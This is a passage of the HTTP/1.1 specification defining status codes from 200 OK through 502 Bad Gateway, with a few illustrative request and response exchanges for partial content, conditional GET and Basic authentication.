The protocol SHOULD be switched only when it is advantageous to do so. For example, switching to a newer version of HTTP is advantageous over older versions, and switching to a real-time, synchronous protocol might be advantageous when delivering resources that use such features.


Successful 2xx

200 OK
The request has succeeded. The information returned with the response is dependent on the method used in the request, for example:

GET an entity corresponding to the requested resource is sent in the response;

HEAD the entity-header fields corresponding to the requested resource are sent in the response without any message-body;

POST an entity describing or containing the result of the action;

TRACE an entity containing the request message as received by the end server.


201 Created
The request has been fulfilled and resulted in a new resource being created. The newly created resource can be referenced by the URI(s) returned in the entity of the response, with the most specific URI for the resource given by a Location header field. The response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. The origin server MUST create the resource before returning the 201 status code. If the action cannot be carried out immediately, the server SHOULD respond with 202 (Accepted) response instead.

A 201 response MAY contain an ETag response header field indicating the current value of the entity tag for the requested variant just created, see section 14.19 .


202 Accepted
The request has been accepted for processing, but the processing has not been completed. The request might or might not eventually be acted upon, as it might be disallowed when processing actually takes place. There is no facility for re-sending a status code from an asynchronous operation such as this.

The 202 response is intentionally non-committal. Its purpose is to allow a server to accept a request for some other process (perhaps a batch-oriented process that is only run once per day) without requiring that the user agent's connection to the server persist until the process is completed. The entity returned with this response SHOULD include an indication of the request's current status and either a pointer to a status monitor or some estimate of when the user can expect the request to be fulfilled.


203 Non-Authoritative Information
The returned metainformation in the entity-header is not the definitive set as available from the origin server, but is gathered from a local or a third-party copy. The set presented MAY be a subset or superset of the original version. For example, including local annotation information about the resource might result in a superset of the metainformation known by the origin server. Use of this response code is not required and is only appropriate when the response would otherwise be 200 (OK).


204 No Content
The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant.

If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view.

The 204 response MUST NOT include a message-body, and thus is always terminated by the first empty line after the header fields.


205 Reset Content
The server has fulfilled the request and the user agent SHOULD reset the document view which caused the request to be sent. This response is primarily intended to allow input for actions to take place via user input, followed by a clearing of the form in which the input is given so that the user can easily initiate another input action. The response MUST NOT include an entity.


206 Partial Content
The server has fulfilled the partial GET request for the resource. The request MUST have included a Range header field (section 14.35) indicating the desired range, and MAY have included an If-Range header field (section 14.27 ) to make the request conditional.

The response MUST include the following header fields:

- Either a Content-Range header field (section 14.16) indicating the range included with this response, or a multipart/byteranges Content-Type including Content-Range fields for each part. If a Content-Length header field is present in the response, its value MUST match the actual number of OCTETs transmitted in the message-body.
- Date
- ETag and/or Content-Location, if the header would have been sent in a 200 response to the same request
- Expires, Cache-Control, and/or Vary, if the field-value might differ from that sent in any previous response for the same variant
If the 206 response is the result of an If-Range request that used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. If the response is the result of an If-Range request that used a weak validator, the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers. Otherwise, the response MUST include all of the entity-headers that would have been returned with a 200 (OK) response to the same request.

A cache MUST NOT combine a 206 response with other previously cached content if the ETag or Last-Modified headers do not match exactly, see 13.5.4 .

A cache that does not support the Range and Content-Range headers MUST NOT cache 206 (Partial) responses.
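
For illustration (resource and lengths are made up), a byte-range request and its 206 response:

GET /archive.zip HTTP/1.1
Host: www.example.com
Range: bytes=0-499

HTTP/1.1 206 Partial Content
Content-Range: bytes 0-499/12345
Content-Length: 500
Content-Type: application/zip

(first 500 octets of the entity-body)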


Redirection 3xx

300 Multiple Choices
The requested resource corresponds to any one of a set of representations, each with its own specific location, and agent- driven negotiation information (section 12) is being provided so that the user (or user agent) can select a preferred representation and redirect its request to that location.

Unless it was a HEAD request, the response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.

If the server has a preferred choice of representation, it SHOULD include the specific URI for that representation in the Location field; user agents MAY use the Location field value for automatic redirection. This response is cacheable unless indicated otherwise.


301 Moved Permanently
The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs. Clients with link editing capabilities ought to automatically re-link references to the Request-URI to one or more of the new references returned by the server, where possible. This response is cacheable unless indicated otherwise.

The new permanent URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).

If the 301 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.

Note: When automatically redirecting a POST request after receiving a 301 status code, some existing HTTP/1.0 user agents will erroneously change it into a GET request.


302 Found
The requested resource resides temporarily under a different URI. Since the redirection might be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field.

The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).

If the 302 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.

Note: RFC 1945 and RFC 2068 specify that the client is not allowed to change the method on the redirected request. However, most existing user agent implementations treat 302 as if it were a 303 response, performing a GET on the Location field-value regardless of the original request method. The status codes 303 and 307 have been added for servers that wish to make unambiguously clear which kind of reaction is expected of the client.

303 See Other
The response to the request can be found under a different URI and SHOULD be retrieved using a GET method on that resource. This method exists primarily to allow the output of a POST-activated script to redirect the user agent to a selected resource. The new URI is not a substitute reference for the originally requested resource. The 303 response MUST NOT be cached, but the response to the second (redirected) request might be cacheable.

The different URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).

Note: Many pre-HTTP/1.1 user agents do not understand the 303 status. When interoperability with such clients is a concern, the 302 status code may be used instead, since most user agents react to a 302 response as described here for 303.

304 Not Modified
If the client has performed a conditional GET request and access is allowed, but the document has not been modified, the server SHOULD respond with this status code. The 304 response MUST NOT contain a message-body, and thus is always terminated by the first empty line after the header fields.

The response MUST include the following header fields:

- Date, unless its omission is required by section 14.18.1
If a clockless origin server obeys these rules, and proxies and clients add their own Date to any response received without one (as already specified by [RFC 2068], section 14.19 ), caches will operate correctly.

- ETag and/or Content-Location, if the header would have been sent in a 200 response to the same request
- Expires, Cache-Control, and/or Vary, if the field-value might differ from that sent in any previous response for the same variant
If the conditional GET used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. Otherwise (i.e., the conditional GET used a weak validator), the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers.

If a 304 response indicates an entity not currently cached, then the cache MUST disregard the response and repeat the request without the conditional.

If a cache uses a received 304 response to update a cache entry, the cache MUST update the entry to reflect any new field values given in the response.
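
For illustration (the validator value is made up), a conditional GET answered with 304:

GET /logo.png HTTP/1.1
Host: www.example.com
If-None-Match: "686897696a7c876b7e"

HTTP/1.1 304 Not Modified
Date: Mon, 12 Jul 2010 10:00:00 GMT
ETag: "686897696a7c876b7e"

No message-body follows; the client keeps using its cached copy.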


305 Use Proxy
The requested resource MUST be accessed through the proxy given by the Location field. The Location field gives the URI of the proxy. The recipient is expected to repeat this single request via the proxy. 305 responses MUST only be generated by origin servers.

Note: RFC 2068 was not clear that 305 was intended to redirect a single request, and to be generated by origin servers only. Not observing these limitations has significant security consequences.

306 (Unused)
The 306 status code was used in a previous version of the specification, is no longer used, and the code is reserved.


307 Temporary Redirect
The requested resource resides temporarily under a different URI. Since the redirection MAY be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field.

The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s) , since many pre-HTTP/1.1 user agents do not understand the 307 status. Therefore, the note SHOULD contain the information necessary for a user to repeat the original request on the new URI.

If the 307 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.


Client Error 4xx

400 Bad Request
The request could not be understood by the server due to malformed syntax. The client SHOULD NOT repeat the request without modifications.


401 Unauthorized
The request requires user authentication. The response MUST include a WWW-Authenticate header field (section 14.47) containing a challenge applicable to the requested resource. The client MAY repeat the request with a suitable Authorization header field (section 14.8 ). If the request already included Authorization credentials, then the 401 response indicates that authorization has been refused for those credentials. If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user SHOULD be presented the entity that was given in the response, since that entity might include relevant diagnostic information. HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43] .
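
For illustration (the credentials are made up), a Basic authentication challenge and retry:

GET /private/ HTTP/1.1
Host: www.example.com

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Restricted Area"

GET /private/ HTTP/1.1
Host: www.example.com
Authorization: Basic Ym9iOnNlY3JldA==

(the Base64 value decodes to "bob:secret")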


402 Payment Required
This code is reserved for future use.


403 Forbidden
The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead.


404 Not Found
The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.


405 Method Not Allowed
The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource.


406 Not Acceptable
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.

Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.

Note: HTTP/1.1 servers are allowed to return responses which are not acceptable according to the accept headers sent in the request. In some cases, this may even be preferable to sending a 406 response. User agents are encouraged to inspect the headers of an incoming response to determine if it is acceptable.
If the response could be unacceptable, a user agent SHOULD temporarily stop receipt of more data and query the user for a decision on further actions.


407 Proxy Authentication Required
This code is similar to 401 (Unauthorized), but indicates that the client must first authenticate itself with the proxy. The proxy MUST return a Proxy-Authenticate header field (section 14.33 ) containing a challenge applicable to the proxy for the requested resource. The client MAY repeat the request with a suitable Proxy-Authorization header field (section 14.34 ). HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43] .


408 Request Timeout
The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.


409 Conflict
The request could not be completed due to a conflict with the current state of the resource. This code is only allowed in situations where it is expected that the user might be able to resolve the conflict and resubmit the request. The response body SHOULD include enough information for the user to recognize the source of the conflict. Ideally, the response entity would include enough information for the user or user agent to fix the problem; however, that might not be possible and is not required.

Conflicts are most likely to occur in response to a PUT request. For example, if versioning were being used and the entity being PUT included changes to a resource which conflict with those made by an earlier (third-party) request, the server might use the 409 response to indicate that it can't complete the request. In this case, the response entity would likely contain a list of the differences between the two versions in a format defined by the response Content-Type.


410 Gone
The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 (Not Found) SHOULD be used instead. This response is cacheable unless indicated otherwise.

The 410 response is primarily intended to assist the task of web maintenance by notifying the recipient that the resource is intentionally unavailable and that the server owners desire that remote links to that resource be removed. Such an event is common for limited-time, promotional services and for resources belonging to individuals no longer working at the server's site. It is not necessary to mark all permanently unavailable resources as "gone" or to keep the mark for any length of time -- that is left to the discretion of the server owner.


411 Length Required
The server refuses to accept the request without a defined Content-Length. The client MAY repeat the request if it adds a valid Content-Length header field containing the length of the message-body in the request message.


412 Precondition Failed
The precondition given in one or more of the request-header fields evaluated to false when it was tested on the server. This response code allows the client to place preconditions on the current resource metainformation (header field data) and thus prevent the requested method from being applied to a resource other than the one intended.


413 Request Entity Too Large
The server is refusing to process a request because the request entity is larger than the server is willing or able to process. The server MAY close the connection to prevent the client from continuing the request.

If the condition is temporary, the server SHOULD include a Retry-After header field to indicate that it is temporary and after what time the client MAY try again.


414 Request-URI Too Long
The server is refusing to service the request because the Request-URI is longer than the server is willing to interpret. This rare condition is only likely to occur when a client has improperly converted a POST request to a GET request with long query information, when the client has descended into a URI "black hole" of redirection (e.g., a redirected URI prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit security holes present in some servers using fixed-length buffers for reading or manipulating the Request-URI.


415 Unsupported Media Type
The server is refusing to service the request because the entity of the request is in a format not supported by the requested resource for the requested method.


416 Requested Range Not Satisfiable
A server SHOULD return a response with this status code if a request included a Range request-header field (section 14.35), and none of the range-specifier values in this field overlap the current extent of the selected resource, and the request did not include an If-Range request-header field. (For byte-ranges, this means that the first-byte-pos of all of the byte-range-spec values were greater than the current length of the selected resource.)

When this status code is returned for a byte-range request, the response SHOULD include a Content-Range entity-header field specifying the current length of the selected resource (see section 14.16). This response MUST NOT use the multipart/byteranges content-type.


417 Expectation Failed
The expectation given in an Expect request-header field (see section 14.20) could not be met by this server, or, if the server is a proxy, the server has unambiguous evidence that the request could not be met by the next-hop server.


Server Error 5xx

500 Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.


501 Not Implemented
The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource.


502 Bad Gateway
The server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.